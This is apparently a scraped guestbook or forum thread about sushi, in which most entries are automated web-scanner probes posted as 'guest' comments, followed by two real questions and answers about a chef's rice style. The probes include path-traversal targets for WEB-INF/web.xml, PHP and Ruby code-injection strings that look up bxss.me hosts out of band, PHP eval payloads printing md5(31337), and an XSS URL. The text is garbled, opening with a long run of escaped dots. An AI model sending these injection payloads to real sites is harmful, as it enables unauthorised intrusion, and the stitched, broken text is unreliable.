\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
'.gethostbyname(lc('hithe'.'hrztcyxsb2335.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(71).chr(115).chr(76).'
re: guest
)
re: guest
".gethostbyname(lc("hitcw"."yguqqxbq7ba22.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(79).chr(121).chr(68)."
re: guest
!(()&&!|*|*|
re: guest
^(#$!@#$)(()))******
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(116).concat(71).concat(97).concat(76)+(require"socket"
Socket.gethostbyname("hitji"+"utsemjymefdb6.bxss.me.")[3].to_s)+"
re: guest
bxss.me/t/xss.html?%00
re: guest
'+'A'.concat(70-3).concat(22*4).concat(122).concat(84).concat(113).concat(81)+(require'socket'
Socket.gethostbyname('hitaa'+'zmjfrwtu503e4.bxss.me.')[3].to_s)+'
re: guest
'"
re: guest
<!--
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
';print(md5(31337));$a='
re: guest
";print(md5(31337));$a="
re: guest
${@print(md5(31337))}
re: guest
${@print(md5(31337))}\
re: guest
'.print(md5(31337)).'
Hi! Have anyone visited Obana recently?
Heard a lot of good things about his neta but I would like to know his shari style. Thanks!
Large al dente grains, medium-strong akazu